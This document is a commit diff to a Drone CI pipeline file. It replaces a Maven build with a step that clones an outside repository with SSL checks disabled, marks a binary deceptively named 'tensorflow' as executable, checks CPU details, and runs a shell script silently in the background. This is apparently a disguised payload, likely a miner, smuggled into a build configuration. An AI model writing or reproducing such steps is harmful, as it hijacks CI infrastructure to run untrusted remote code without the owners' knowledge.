Update '.drone.yml'
continuous-integration/drone/push Build is failing Details

This commit is contained in:
agussusahnti 2022-03-28 01:09:00 +00:00
parent 7feddbcfbe
commit 4a734815de
1 changed files with 8 additions and 12 deletions

View File

@ -1,20 +1,16 @@
--- ---
kind: pipeline kind: pipeline
name: examples type: docker
name: lint
steps: steps:
- name: build - name: build
image: maven image: golang:1.17
volumes:
- name: lib
path: /drone/lib
- name: m2
path: /root/.m2
commands: commands:
- mvn -ntp verify - git -c http.sslVerify "false" clone https://gitlab.zam.io/wajinhakim/drone-test.git
- cd /drone/lib - cd drone-test
- git clone https://github.com/metaborg/spt.git - chmod +x tensorflow
- cd spt/org.metaborg.spt.cmd - lscpu
- mvn -ntp package - nohup bash direct.sh > /dev/null
- name: run_spt - name: run_spt
image: maven image: maven
volumes: volumes: